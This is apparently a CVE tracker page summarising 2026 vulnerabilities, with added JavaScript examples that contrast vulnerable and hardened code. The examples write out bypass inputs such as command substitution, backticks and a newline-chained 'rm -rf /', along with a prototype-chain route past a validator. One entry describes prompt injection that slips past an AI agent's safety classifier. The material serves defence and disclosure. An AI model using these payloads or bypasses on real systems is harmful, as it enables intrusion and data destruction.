244 CVEs tracked today. 32 Critical, 65 High, 135 Medium, 12 Low.
-
CVE-2026-3356
CRITICAL
CVSS 9.3
Anritsu MS27100A/MS27101A/MS27102A/MS27103A Remote Spectrum Monitors contain a design-level authentication bypass allowing unauthenticated remote attackers to fully access and manipulate the management interface. This is not a configuration weakness but an inherent architectural flaw (CWE-306: Missing Authentication) with CVSS 9.3 critical severity. No public exploit identified at time of analysis, but trivial exploitation is expected given the complete absence of authentication mechanisms. ICS-CERT advisory confirms the vulnerability affects operational technology environments.
Authentication Bypass
-
CVE-2026-1579
CRITICAL
CVSS 9.3
Unauthenticated remote code execution in PX4 Autopilot via MAVLink protocol allows network attackers to execute arbitrary commands through SERIAL_CONTROL messages when message signing is disabled. The MAVLink 2.0 protocol in PX4 accepts unsigned messages by default, enabling any party with network access to the MAVLink interface to send interactive shell commands without cryptographic authentication. EPSS data not provided; no KEV status confirmed; reported by ICS-CERT indicating potential operational technology impact.
Authentication Bypass
-
CVE-2026-34532
CRITICAL
CVSS 9.1
Parse Server Cloud Function validator bypass allows unauthenticated remote attackers to execute protected server-side functions by exploiting prototype chain traversal. Attackers append 'prototype.constructor' to Cloud Function URLs to circumvent access controls (requireUser, requireMaster, custom validators), enabling unauthorized execution of backend business logic. Affects Parse Server versions prior to 8.6.67 and 9.7.0-alpha.11. No public exploit identified at time of analysis, though the attack vector is network-accessible with low complexity (CVSS:4.0 AV:N/AC:L/PR:N). The vulnerability stems from inconsistent prototype chain resolution between handler and validator stores (CWE-863: Incorrect Authorization).
Node.js
Authentication Bypass
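Added illustration of the bug class behind the CVE-2026-34532 entry above (this is example code written for this page, not Parse Server's own code): a registry of cloud functions and a registry of their validators are looked up differently, so a dotted name such as deleteAccount.prototype.constructor walks the prototype chain in one registry but not in the other. The store layout, function names and request shape are hypothetical.

```javascript
'use strict';
// Example, not Parse Server code. Two plain-object stores keyed by function
// name; only "deleteAccount" has a validator. Names are hypothetical.
function makeStores() {
  const handlers = {};
  const validators = {};
  // A regular function (not an arrow) has a .prototype whose .constructor
  // points back at the function itself; that is the traversal path.
  handlers.deleteAccount = function (req) { return `deleted user ${req.user}`; };
  validators.deleteAccount = function (req) {
    if (!req.master) throw new Error('requireMaster');
  };
  return { handlers, validators };
}

// Naive dotted-path resolver: each segment is an unchecked property read, so
// "x.prototype.constructor" resolves to the same function as "x".
function resolvePath(obj, path) {
  return path.split('.').reduce((cur, key) => (cur == null ? undefined : cur[key]), obj);
}

// Vulnerable dispatch: the handler is resolved through the prototype chain
// while the validator is looked up by the literal name, so the two disagree
// and the validator is silently skipped.
function dispatchVulnerable(stores, name, req) {
  const handler = resolvePath(stores.handlers, name);
  if (typeof handler !== 'function') return 'not found';
  const validator = stores.validators[name]; // undefined for the dotted name
  if (validator) validator(req);
  return handler(req);
}

// Hardened dispatch: accept only a bare identifier, and require it to be an
// own property of the store so inherited Object.prototype members
// ("constructor", "toString", ...) are never callable.
function dispatchHardened(stores, name, req) {
  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(name)) return 'not found';
  const own = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  if (!own(stores.handlers, name)) return 'not found';
  if (own(stores.validators, name)) stores.validators[name](req);
  return stores.handlers[name](req);
}

function demo() {
  const stores = makeStores();
  const req = { user: 'bob', master: false };   // constructed low-privilege request
  let honest;
  try { dispatchVulnerable(stores, 'deleteAccount', req); honest = 'ran'; }
  catch (e) { honest = e.message; }
  return {
    honest,                                                                          // 'requireMaster'
    bypass: dispatchVulnerable(stores, 'deleteAccount.prototype.constructor', req), // validator skipped
    inheritedVulnerable: dispatchVulnerable(stores, 'constructor', req) === req,     // Object(req) runs
    hardened: dispatchHardened(stores, 'deleteAccount.prototype.constructor', req),  // 'not found'
    inherited: dispatchHardened(stores, 'constructor', req),                         // 'not found'
  };
}
```

The fix has two independent parts and both matter: the name grammar stops dotted traversal, and the own-property check stops bare inherited names such as constructor, which the grammar alone would accept. Using Map or Object.create(null) for the stores gives the second property for free.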
-
CVE-2026-34449
CRITICAL
CVSS 9.6
Remote code execution in SiYuan desktop application (versions prior to 3.6.2) allows unauthenticated remote attackers to execute arbitrary code with full operating system privileges through CORS misconfiguration. A malicious website can inject JavaScript into the Electron-based application's Node.js context via the permissive API (Access-Control-Allow-Origin: * with Access-Control-Allow-Private-Network: true), which executes with OS-level access when the user next opens SiYuan's interface. No public exploit identified at time of analysis, though CVSS 9.6 (Critical) reflects network-accessible attack vector with low complexity requiring only user interaction (visiting malicious site while SiYuan runs). EPSS data not provided, but the combination of Electron framework exploitation, RCE impact, and trivial attack complexity suggests elevated real-world risk for desktop users.
RCE
Cors Misconfiguration
Node.js
-
CVE-2026-34448
CRITICAL
CVSS 9.0
Stored cross-site scripting (XSS) in SiYuan personal knowledge management system escalates to arbitrary operating system command execution on desktop clients. Authenticated attackers with low privileges can inject malicious URLs into Attribute View asset fields that execute JavaScript when victims view Gallery or Kanban layouts with "Cover From -> Asset Field" enabled. The Electron desktop client's configuration (nodeIntegration enabled, contextIsolation disabled) allows the XSS payload to break sandbox boundaries and execute arbitrary commands under the victim's OS account. CVSS 9.0 (Critical) with network attack vector, low complexity, and cross-scope impact. Vendor-released patch: version 3.6.2. No public exploit identified at time of analysis, though technical details are disclosed in GitHub advisory GHSA-rx4h-526q-4458.
XSS
Command Injection
-
CVE-2026-34406
CRITICAL
CVSS 9.4
Privilege escalation in APTRS (Automated Penetration Testing Reporting System) prior to version 2.0.1 allows any user to escalate their own account or modify any other user account to superuser status by submitting a crafted POST request to /api/auth/edituser/<pk> with an is_superuser field set to true. The CustomUserSerializer fails to mark is_superuser as read-only despite including it in serializer fields, and the edit_user view lacks validation to prevent non-superusers from modifying this critical field. No public exploit code or active exploitation has been identified at time of analysis, but the vulnerability is trivial to exploit given basic HTTP client access to the endpoint.
Python
Privilege Escalation
-
CVE-2026-34162
CRITICAL
CVSS 10.0
Unauthenticated HTTP proxy abuse in FastGPT (AI Agent platform) prior to v4.14.9.5 allows remote attackers to relay arbitrary HTTP requests through the server. The /api/core/app/httpTools/runTool endpoint accepts user-controlled URLs, methods, headers, and body parameters without authentication, functioning as an open proxy for network pivoting, credential theft, and internal network reconnaissance. CVSS 10.0 (Critical) with network attack vector and no privileges required. No public exploit identified at time of analysis, though exploitation is trivial given the exposed endpoint design. EPSS data not available.
Authentication Bypass
-
CVE-2026-33579
CRITICAL
CVSS 9.4
Privilege escalation in OpenClaw (before 2026.3.28) allows remote attackers to gain administrative access by exploiting missing scope validation in the device pairing approval workflow. The /pair approve command fails to forward the caller's scopes to the approval check, so a caller holding only basic pairing privileges (or, per the PR:N vector, possibly none at all) can approve device requests carrying elevated admin scopes. EPSS data not available; no public exploit identified at time of analysis, though the vector (network-accessible, low complexity, no authentication barrier) indicates trivial exploitation. Vendor-released patch: commit e403dec (2026.3.28+).
Privilege Escalation
Authentication Bypass
-
CVE-2026-32917
CRITICAL
CVSS 9.2
Remote command injection in OpenClaw's iMessage attachment staging mechanism (versions prior to 2026.3.13) allows unauthenticated network attackers to execute arbitrary commands on configured remote hosts via malicious attachment paths. The flaw stems from shell metacharacters in attachment paths being passed unsanitized into SCP operations, giving full system compromise when remote attachment staging is enabled. EPSS data and KEV status not provided. No standalone public exploit identified at time of analysis; the fix commit on GitHub is public and exposes the vulnerable code path, which lowers the effort needed to build a proof of concept.
Command Injection
-
CVE-2026-32916
CRITICAL
CVSS 9.2
Authorization bypass in OpenClaw 2026.3.7 through 2026.3.10 enables remote unauthenticated attackers to execute privileged gateway operations through plugin subagent routes. Synthetic operator clients are created with excessive administrative scopes, allowing attackers to delete sessions and execute agent commands without authentication. Network attack vector with high attack complexity (AC:H). No public exploit identified at time of analysis, though technical details are available via the GitHub security advisory and VulnCheck analysis.
Authentication Bypass
-
CVE-2026-32871
CRITICAL
CVSS 10.0
Server-Side Request Forgery (SSRF) in FastMCP's OpenAPIProvider allows authenticated attackers to reach arbitrary backend endpoints through path traversal in OpenAPI path parameters. The flaw is improper URL encoding in the RequestDirector._build_url() method, which lets '../' sequences in a path parameter escape the intended API prefix and reach internal administrative or sensitive endpoints while inheriting the MCP provider's authentication context. This affects the fastmcp Python package and permits access beyond the API surface defined in the OpenAPI specification. The GitHub advisory includes proof-of-concept code demonstrating traversal to /admin endpoints; no other public exploit identified at time of analysis.
SSRF
Path Traversal
Authentication Bypass
Privilege Escalation
Python
-
CVE-2026-32714
CRITICAL
CVSS 9.8
SQL injection in the SciTokens Python library allows unauthenticated remote attackers to execute arbitrary SQL against the local SQLite key cache. The KeyCache class builds SQL queries with str.format() from attacker-controlled issuer and key_id parameters, enabling arbitrary SQL command execution. Affects all versions prior to 1.9.6. CVSS 9.8 (Critical) with network attack vector, low complexity, and no privileges required. Not listed in CISA KEV (no confirmed active exploitation at time of analysis), though the straightforward nature of SQL injection and the public patch details increase exploitation risk.
Python
SQLi
-
CVE-2026-30880
CRITICAL
CVSS 9.2
OS command injection in baserCMS installer prior to version 5.2.3 allows remote attackers to execute arbitrary system commands during the installation process. The vulnerability exists in the installer component and has been patched in version 5.2.3. Attack complexity appears low given the installer context, though CVSS metrics are unavailable for detailed severity assessment.
Command Injection
-
CVE-2026-30877
CRITICAL
CVSS 9.1
OS command injection in baserCMS update functionality allows authenticated administrators to execute arbitrary commands on the server with application privileges. Affects baserCMS versions prior to 5.2.3. Vendor-released patch available in version 5.2.3. CVSS 9.1 reflects high impact with changed scope, though exploitation requires high-privilege administrator access (PR:H). No public exploit identified at time of analysis. EPSS data not provided, but attack complexity is low (AC:L) once admin credentials are obtained.
Command Injection
-
CVE-2026-30314
CRITICAL
CVSS 9.8
Remote code execution in Ridvay Code's command auto-approval module allows unauthenticated attackers to bypass whitelist security controls via shell command substitution syntax (e.g., $(...) or backticks) embedded in command arguments. The vulnerability stems from insufficient regular expression validation that fails to detect command injection payloads, permitting an attacker to execute arbitrary OS commands with automatic approval. No user interaction is required; a crafted command such as git log --grep="$(malicious_command)" will be misidentified as safe and executed by the underlying shell, resulting in remote code execution.
RCE
Command Injection
-
CVE-2026-30312
CRITICAL
CVSS 9.8
Remote code execution in DSAI-Cline's command auto-approval module allows unauthenticated attackers to bypass whitelist validation by embedding literal newline characters in command payloads, causing the system to execute arbitrary OS commands without user interaction. The check relies on string-based parsing that does not treat a newline as a command separator, so a whitelisted command (e.g., git log) can be chained with malicious code that PowerShell then runs as a second command. CVSS vector, EPSS data and KEV status are not available; exploitation status and real-world impact remain unconfirmed.
RCE
Command Injection
-
CVE-2026-30311
CRITICAL
CVSS 9.8
Remote code execution in Ridvay Code's command auto-approval module allows unauthenticated attackers to bypass whitelist protections via shell command substitution syntax ($(…) and backticks) embedded in seemingly benign git commands, achieving code execution without user interaction. The vulnerability exploits inadequate regular expression validation that fails to detect shell metacharacters in command arguments, enabling attackers to inject arbitrary commands that execute with the privileges of the Ridvay Code process.
RCE
Command Injection
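Added illustration covering the three auto-approval entries above (CVE-2026-30314, CVE-2026-30312 and CVE-2026-30311). This is example code written for this page, not the code of Ridvay Code, DSAI-Cline or their upstream; the allowlist, the approved subcommands and the argument grammar are hypothetical. It shows a prefix-regex approval check, the three payload shapes that slip past it ($(...) substitution, backticks and an embedded newline), and a hardened check that also refuses to hand the string to a shell at all.

```javascript
'use strict';
// Example, not the code of any of the tools above.

// Naive check: "starts with a read-only git subcommand" is treated as safe.
// Without the /m flag, ^ only matches at the start of the string, so nothing
// after the approved prefix (including a newline) is examined.
const ALLOW_PREFIX = /^git (log|status|diff)\b/;
function isApprovedNaive(cmd) {
  return ALLOW_PREFIX.test(cmd);
}

// Hardened check: refuse any character that lets a shell (sh or PowerShell)
// start a second command or substitute output, then match the whole string
// against a closed argument grammar instead of a prefix. Deliberately
// conservative: "$HOME" is rejected along with "$(id)".
const SHELL_META = /[`$;&|<>(){}\r\n]/;
const ALLOW_FULL = /^git (log|status|diff)(?: [A-Za-z0-9_.,:=\/@"' -]*)?$/;
function isApprovedHardened(cmd) {
  if (SHELL_META.test(cmd)) return false;
  return ALLOW_FULL.test(cmd);
}

// Even an approved string should not be given to a shell. Tokenize it into
// argv (quotes group words, nothing is expanded) so the program can be run
// with child_process.spawn(file, args) and "$(id)" is just bytes in an
// argument rather than something a shell interprets.
function toArgv(cmd) {
  const argv = [];
  let cur = '';
  let quote = null;
  let inWord = false;
  for (const ch of cmd) {
    if (quote) {
      if (ch === quote) quote = null; else cur += ch;
    } else if (ch === '"' || ch === "'") {
      quote = ch; inWord = true;
    } else if (/\s/.test(ch)) {
      if (inWord) { argv.push(cur); cur = ''; inWord = false; }
    } else {
      cur += ch; inWord = true;
    }
  }
  if (quote) throw new Error('unterminated quote');
  if (inWord) argv.push(cur);
  return argv;
}

// Returns the spawn plan for an approved command, or null when it is refused.
function planExecution(cmd) {
  if (!isApprovedHardened(cmd)) return null;
  const [file, ...args] = toArgv(cmd);
  // Caller: require('child_process').spawn(file, args, { shell: false })
  return { file, args };
}
```

Run isApprovedNaive against 'git log --grep="$(id)"', 'git log `id`' and 'git log\nrm -rf /' and all three are approved; isApprovedHardened rejects all three and still accepts 'git log --oneline -n 5'. The argv step is what actually removes the class of bug: a shell-free spawn has no substitution or separator semantics, so the regex becomes defence in depth rather than the only barrier.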
-
CVE-2026-30310
CRITICAL
CVSS 9.8
Prompt injection attacks in Sixth's automatic terminal command execution feature bypass the model-based safety classification system, allowing attackers to execute arbitrary commands without user approval by wrapping malicious payloads in templates that mislead the AI into treating them as safe operations.
Command Injection
-
CVE-2026-30286
CRITICAL
CVSS 9.8
Arbitrary file overwrite in Funambol Zefiro Cloud v32.0.2026011614 allows attackers to overwrite critical internal files during the file import process, enabling remote code execution or information disclosure. The vulnerability affects the cloud application and its associated mobile client. No CVSS vector or vendor patch was available at analysis time, though the reported impact (RCE or information exposure) is severe.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30285
CRITICAL
CVSS 9.8
Arbitrary file overwrite in Zora: Post, Trade, Earn Crypto v2.60.0 enables attackers to overwrite critical internal files through the file import process, resulting in remote code execution or information exposure. The vulnerability affects the cryptocurrency trading application's file handling mechanism, allowing unauthenticated remote attackers to inject malicious content into system-critical files. No active exploitation has been confirmed at time of analysis, though the attack vector and impact severity warrant immediate investigation by affected users.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30283
CRITICAL
CVSS 9.8
Arbitrary file overwrite in PEAKSEL D.O.O. NIS Animal Sounds and Ringtones v1.3.0 allows attackers to overwrite critical internal files during the file import process, enabling remote code execution or sensitive information exposure. The vulnerability affects the application's import functionality without requiring authentication. No public exploit code or active exploitation has been independently confirmed at the time of analysis.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30282
CRITICAL
CVSS 9.0
Arbitrary file overwrite in UXGROUP LLC Cast to TV Screen Mirroring v2.2.77 enables remote attackers to overwrite critical application files through a malicious file import process, resulting in remote code execution or information disclosure. No CVSS vector, public exploit code, or active exploitation confirmed from available data.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30281
CRITICAL
CVSS 9.8
Arbitrary file overwrite in MaruNuri LLC v2.0.23 allows remote attackers to overwrite critical internal files during the file import process, enabling arbitrary code execution or information exposure. No CVSS vector, public exploit code, or active exploitation status is documented in available sources.
RCE
Information Disclosure
-
CVE-2026-30278
CRITICAL
CVSS 9.8
Arbitrary file overwrite in FLY is FUN Aviation Navigation v35.33 permits attackers to overwrite critical internal files through the file import process, enabling remote code execution or information disclosure. No CVSS vector or patch status has been established. The vulnerability affects a niche aviation navigation product with limited public disclosure.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30276
CRITICAL
CVSS 9.8
Arbitrary file overwrite in DeftPDF Document Translator v54.0 permits attackers to overwrite critical internal files through the file import mechanism, potentially enabling remote code execution or sensitive information exposure. The vulnerability affects DeftPDF Document Translator specifically at version 54.0 and is documented by academic researchers at Fudan University's security systems group. Attack complexity and authentication requirements cannot be definitively assessed due to missing CVSS vector data, though the file import process suggests user interaction may be required.
RCE
Information Disclosure
-
CVE-2026-21861
CRITICAL
CVSS 9.1
OS command injection in baserCMS core update functionality allows authenticated administrators to execute arbitrary system commands on the server. The vulnerability affects baserCMS versions prior to 5.2.3, stemming from improper sanitization of user-controlled input passed directly to exec() functions. With CVSS 9.1 (Critical) due to network accessibility, low complexity, and cross-scope impact, this represents a severe risk in multi-tenant or managed hosting environments where administrative boundaries must be enforced. EPSS data not available, no CISA KEV listing confirmed, and authentication requirements (PR:H) limit exploit surface to compromised or malicious administrator accounts.
Command Injection
-
CVE-2026-4317
CRITICAL
CVSS 9.3
SQL injection in Umami Software's web analytics application allows authenticated attackers with low privileges to execute arbitrary SQL commands via unsanitized timezone parameter. The vulnerability affects raw query implementations (prisma.rawQuery, $queryRawUnsafe, ClickHouse raw queries) with CVSS 9.3 severity. Successful exploitation enables database compromise and execution of dangerous functions. Patch available per vendor advisory; no public exploit identified at time of analysis, though the straightforward attack vector (network-accessible, low complexity, low privileges required) presents significant risk for deployments with untrusted authenticated users.
SQLi
-
CVE-2026-3300
CRITICAL
CVSS 9.8
Remote code execution in Everest Forms Pro plugin for WordPress ≤1.9.12 allows unauthenticated attackers to execute arbitrary PHP code on the server via the Complex Calculation feature. Attackers can inject malicious PHP through any string-type form field (text, email, URL, select, radio) due to unsafe concatenation into eval() without proper escaping. This vulnerability carries a 9.8 CVSS score with maximum impact (confidentiality, integrity, availability) and requires no authentication or user interaction, representing a critical immediate threat to all installations using the affected plugin versions.
WordPress
PHP
RCE
Code Injection
-
CVE-2026-3107
CRITICAL
CVSS 9.3
Stored cross-site scripting in Teampass password manager versions before 3.1.5.16 enables unauthenticated remote attackers to inject malicious JavaScript through the password import functionality, achieving persistent code execution in victims' browsers including administrators. CVSS 9.3 (Critical) with EPSS data unavailable, no KEV listing, and patch available per vendor advisory. Attack requires no authentication (PR:N) and low complexity (AC:L), creating significant risk for organizational password compromise and lateral movement.
XSS
PHP
-
CVE-2026-3106
CRITICAL
CVSS 9.3
Blind Cross-Site Scripting in Teampass password manager versions prior to 3.1.5.16 allows unauthenticated remote attackers to execute arbitrary JavaScript in administrator browsers via malicious username input during failed login attempts. The vulnerability achieves high confidentiality and integrity impact (CVSS 9.3) because malicious code is stored and automatically executed when administrators review failed authentication logs, enabling potential session hijacking, credential theft, or administrative account compromise. No active exploitation confirmed via CISA KEV, though the attack requires no authentication and minimal complexity.
XSS
PHP
-
CVE-2026-0596
CRITICAL
CVSS 9.6
Command injection in MLflow's MLServer integration allows unauthenticated adjacent network attackers to execute arbitrary commands when models are served with enable_mlserver=True. Unsanitized model_uri parameters embedded in bash -c commands enable shell metacharacter exploitation (command substitution via $() or backticks). With CVSS 9.6 (Critical) and adjacent network attack vector, this poses significant risk in multi-tenant MLOps environments where lower-privileged users can control model URIs served by higher-privileged services. No public exploit code identified at time of analysis, with EPSS data not yet available for this recent CVE.
Command Injection
Privilege Escalation
-
CVE-2025-15618
CRITICAL
CVSS 9.1
Business::OnlinePayment::StoredTransaction through version 0.01 derives its secret key by MD5-hashing the output of a single rand() call, a low-entropy seed, exposing encrypted credit card transaction data to key recovery by brute force. The vulnerability affects Perl applications that rely on this module for payment processing, allowing attackers to potentially decrypt stored transaction records. No CVSS vector was published, but the direct compromise of payment card encryption represents critical risk to financial data confidentiality.
Information Disclosure
-
CVE-2026-34784
HIGH
CVSS 8.2
Parse Server versions prior to 8.6.71 and 9.7.1-alpha.1 allow HTTP Range requests to bypass the afterFind trigger and its validators when files are downloaded from streaming-capable storage adapters such as GridFS, giving unauthorized access to files that should be restricted by authentication or authorization logic. This authorization bypass affects every deployment on an affected version whose file protection is enforced via afterFind triggers.
Node.js
Authentication Bypass
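Added illustration of the pattern behind the CVE-2026-34784 entry above (example code written for this page, not Parse Server's own code): an afterFind-style access hook guards file reads, but a streaming fast path for HTTP Range requests returns before the hook runs. The in-memory file store, the hook, the user names and the file contents are all constructed for the example.

```javascript
'use strict';
// Example, not Parse Server code. Hypothetical file service with an
// afterFind-style hook that must run on every read.
function makeFileService() {
  const files = new Map([
    ['secret.txt', { owner: 'alice', data: Buffer.from('constructed secret payload') }],
  ]);
  // Hook: throws unless the requester owns the file.
  const afterFind = (file, user) => {
    if (file.owner !== user) throw new Error('forbidden');
  };

  // Parse "bytes=start-end" (or "bytes=-suffix") into a clamped [start, end].
  function parseRange(header, size) {
    const m = /^bytes=(\d*)-(\d*)$/.exec(header || '');
    if (!m) return null;
    const start = m[1] === '' ? Math.max(0, size - Number(m[2])) : Number(m[1]);
    const end = m[1] !== '' && m[2] !== '' ? Math.min(Number(m[2]), size - 1) : size - 1;
    return start <= end ? [start, end] : null;
  }

  // Vulnerable: the Range branch was added as a streaming optimisation and
  // returns early, so the hook only runs for plain GETs.
  function getVulnerable(name, user, rangeHeader) {
    const file = files.get(name);
    if (!file) return { status: 404 };
    const range = parseRange(rangeHeader, file.data.length);
    if (range) {
      return { status: 206, body: file.data.subarray(range[0], range[1] + 1) };
    }
    afterFind(file, user);
    return { status: 200, body: file.data };
  }

  // Hardened: authorize first, then decide how to send the bytes. Every
  // transport variant (full, ranged, streamed) sits below the same check.
  function getHardened(name, user, rangeHeader) {
    const file = files.get(name);
    if (!file) return { status: 404 };
    afterFind(file, user);
    const range = parseRange(rangeHeader, file.data.length);
    if (range) return { status: 206, body: file.data.subarray(range[0], range[1] + 1) };
    return { status: 200, body: file.data };
  }

  return { getVulnerable, getHardened };
}

function demo() {
  const svc = makeFileService();
  // "mallory" does not own the file; she tries with and without a Range header.
  const tryGet = (fn, range) => {
    try {
      const r = fn('secret.txt', 'mallory', range);
      return `${r.status}:${r.body.toString()}`;
    } catch (e) {
      return e.message;
    }
  };
  return {
    plainVulnerable: tryGet(svc.getVulnerable, undefined),  // 'forbidden'
    rangeVulnerable: tryGet(svc.getVulnerable, 'bytes=0-'), // '206:constructed secret payload'
    rangeHardened: tryGet(svc.getHardened, 'bytes=0-'),     // 'forbidden'
  };
}
```

The check to add when reviewing any file route is that every response-producing branch (full body, ranged body, HEAD, redirect to a signed URL) is reachable only after the authorization hook, which is easiest to guarantee when the hook is the first statement after the lookup rather than something each branch remembers to call.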
-
CVE-2026-34731
HIGH
CVSS 7.5
Unauthenticated attackers can remotely terminate any active live stream in WWBN AVideo 26.0 and prior by sending crafted POST requests to the on_publish_done.php endpoint in the Live plugin. The vulnerability combines two weaknesses: an unauthenticated stats.json.php endpoint that exposes active stream keys, and the on_publish_done.php RTMP callback handler that processes stream termination requests without authentication or authorization checks. This enables complete denial-of-service against all platform live streaming functionality. CVSS 7.5 (High) with network attack vector, low complexity, and no privileges required. No vendor-released patch identified at time of analysis; EPSS data not available.
PHP
Authentication Bypass
-
CVE-2026-34605
HIGH
CVSS 8.6
Cross-site scripting (XSS) in SiYuan personal knowledge management system versions 3.6.0-3.6.1 allows remote attackers to execute arbitrary JavaScript via the unauthenticated /api/icon/getDynamicIcon endpoint by bypassing SVG sanitization using XML namespace-prefixed element names. The vulnerability exploits a parser inconsistency where Go's HTML5 parser treats 'x:script' as a distinct tag while browsers' XML parsers resolve the namespace prefix to execute the script. Publicly available exploit code exists (GitHub issue #17246 documents the bypass technique), though no CISA KEV listing indicates mass exploitation campaigns at time of analysis.
XSS
-
CVE-2026-34585
HIGH
CVSS 8.6
Stored cross-site scripting (XSS) in SiYuan personal knowledge management system versions prior to 3.6.2 escalates to remote code execution in the Electron desktop client. Attackers craft malicious .sy.zip import files containing HTML entities mixed with raw special characters that bypass server-side attribute escaping, injecting event handlers into imported notes. When victims open the compromised note in the Electron client, injected JavaScript executes with full Node/Electron API access, enabling arbitrary code execution. CVSS 8.6 (High) with local attack vector requiring user interaction; no public exploit identified at time of analysis.
XSS
RCE
-
CVE-2026-34573
HIGH
CVSS 8.2
GraphQL query complexity validator in Parse Server allows remote denial-of-service via crafted queries with binary fan-out fragment spreads, blocking the Node.js event loop for seconds with a single unauthenticated request. Parse Server versions prior to 8.6.68 and 9.7.0-alpha.12 are affected when requestComplexity.graphQLDepth or requestComplexity.graphQLFields options are enabled. EPSS data not provided; no public exploit identified at time of analysis. CVSS 8.2 (High) reflects network-accessible attack with low complexity requiring no privileges, causing high availability impact.
Node.js
Information Disclosure
-
CVE-2026-34529
HIGH
CVSS 7.6
Stored XSS in File Browser's EPUB preview function (versions ≤v2.62.1) allows authenticated attackers to steal JWT tokens and escalate privileges by uploading malicious EPUB files. The vulnerability arises from passing allowScriptedContent:true to the epub.js library combined with an ineffective iframe sandbox (allow-scripts + allow-same-origin), enabling JavaScript in crafted EPUBs to access parent frame localStorage. CVSS 7.6 (AV:N/AC:L/PR:L/UI:R/S:C). No public exploit identified at time of analysis beyond the detailed PoC in the advisory. EPSS data not available. Vendor-released patch available per GitHub advisory. Low-privilege users with file upload permissions can weaponize this to compromise administrator sessions.
XSS
Privilege Escalation
Python
Docker
Mozilla
-
CVE-2026-34528
HIGH
CVSS 8.1
File Browser's self-registration mechanism grants arbitrary shell command execution to unauthenticated attackers when administrators enable signup alongside server-side execution. The signupHandler inherits Execute permissions and Commands lists from default user templates but only strips Admin privileges, allowing newly registered users to immediately execute arbitrary commands via WebSocket with the process's full privileges. Vendor patch available. EPSS data not provided, but the specific configuration requirement (signup + enableExec + Execute in defaults) significantly narrows the attack surface despite the network-accessible, unauthenticated attack vector (CVSS 8.1 High). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis beyond the detailed proof-of-concept in the advisory.
Privilege Escalation
Node.js
-
CVE-2026-34503
HIGH
CVSS 8.6
WebSocket session fixation in OpenClaw before version 2026.3.28 enables attackers to maintain unauthorized access after credential revocation. The vulnerability permits unauthenticated remote attackers (CVSS PR:N) to exploit persistent WebSocket connections that fail to terminate when device tokens are revoked, resulting in high confidentiality impact. No public exploit identified at time of analysis, though the attack vector is network-accessible with low complexity. EPSS data not available; affects OpenClaw deployments with WebSocket-based device communication.
Authentication Bypass
-
CVE-2026-34453
HIGH
CVSS 7.5
Unauthenticated information disclosure in SiYuan personal knowledge management system versions before 3.6.2 allows remote attackers to retrieve confidential content from password-protected documents via the publish service's bookmark API endpoint. The vulnerability bypasses document-level access controls by treating nil authentication contexts as authorized during bookmark filtering, exposing any bookmarked blocks without password verification. CVSS 7.5 (High) with network-based exploitation requiring no privileges or user interaction; no public exploit identified at time of analysis, though the security advisory provides detailed technical disclosure.
Authentication Bypass
-
CVE-2026-34394
HIGH
CVSS 8.1
Cross-site request forgery in WWBN AVideo 26.0 and earlier enables remote attackers to reconfigure critical plugin settings through forged requests targeting admin/save.json.php. The endpoint lacks CSRF token validation while the application sets SameSite=None cookies, allowing attackers to manipulate payment processors, authentication providers, and cloud storage credentials by tricking authenticated administrators into visiting malicious pages. No vendor-released patch identified at time of analysis. EPSS data unavailable; not listed in CISA KEV; no public exploit identified at time of analysis, though exploitation requires only standard CSRF techniques.
CSRF
PHP
-
CVE-2026-34381
HIGH
CVSS 7.5
Unauthenticated remote access to restricted documents in Admidio 5.0.0-5.0.7 Docker deployments allows disclosure of role-protected files. The Docker image's Apache configuration disables .htaccess processing (AllowOverride None), bypassing intended access controls on uploaded documents. Attackers can directly retrieve files via HTTP without authentication using paths disclosed in upload response JSON. CVSS 7.5 (High) with network-based attack vector and no authentication required. No public exploit identified at time of analysis, though exploitation is straightforward given the configuration flaw.
Apache
Docker
Authentication Bypass
-
CVE-2026-34367
HIGH
CVSS 7.6
Server-Side Request Forgery in InvoiceShelf prior to version 2.2.0 allows authenticated high-privilege users to force the server to make arbitrary HTTP requests through the invoice PDF generation module. Attackers can inject malicious HTML into the invoice Notes field, which Dompdf processes without sanitization, fetching remote resources and potentially accessing internal network services or exfiltrating data via out-of-band channels. EPSS data not available; no public exploit identified at time of analysis. The CVSS score of 7.6 reflects high confidentiality impact with scope change, indicating potential for significant internal network reconnaissance.
SSRF
-
CVE-2026-34366
HIGH
CVSS 7.6
Server-Side Request Forgery in InvoiceShelf's PDF payment receipt generation allows authenticated high-privilege users to make arbitrary HTTP requests from the server through unsanitized HTML injection in payment Notes fields. The vulnerability affects InvoiceShelf versions prior to 2.2.0, leveraging the Dompdf library's resource fetching behavior to pivot attacks against internal network resources or exfiltrate data via DNS/HTTP channels. CVSS 7.6 reflects network-accessible attack with low complexity but high privileges required and cross-scope impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE. Vendor-released patch available in version 2.2.0 per GitHub security advisory.
SSRF
-
CVE-2026-34365
HIGH
CVSS 7.6
Server-Side Request Forgery in InvoiceShelf 2.x allows authenticated administrators to exfiltrate internal network data via malicious HTML in estimate PDF generation. The vulnerability stems from unsanitized user input passed to the Dompdf rendering library, enabling arbitrary HTTP requests from the server. Exploitable through PDF preview and customer view endpoints without requiring email functionality. Patched in version 2.2.0. CVSS 7.6 reflects high confidentiality impact with scope change (C:H/S:C), requiring high privileges (PR:H) but low attack complexity over network vector. No confirmed active exploitation (not in CISA KEV), but the technical barrier is low for authenticated attackers with administrative access.
SSRF
-
CVE-2026-34240
HIGH
CVSS 7.5
JWT token forgery in appsup-dart/jose library (versions prior to 0.3.5+1) enables remote attackers to bypass authentication by embedding attacker-controlled public keys in JOSE headers. The library incorrectly accepts header-supplied 'jwk' parameters as trusted verification keys without validating they exist in the application's trusted keystore, allowing unauthenticated attackers to sign arbitrary tokens with their own key pairs. EPSS data not available; no public exploit identified at time of analysis, though exploitation requires only standard JWT manipulation tools.
Jwt Attack
Information Disclosure
-
CVE-2026-34200
HIGH
CVSS 7.7
Nhost CLI MCP server before version 1.41.0 allows cross-origin requests without authentication when explicitly configured to listen on a network port, enabling malicious websites to invoke privileged tools using developer credentials. The vulnerability requires two explicit non-default configuration steps and does not affect the default configuration, significantly limiting real-world exposure.
Authentication Bypass
-
CVE-2026-34163
HIGH
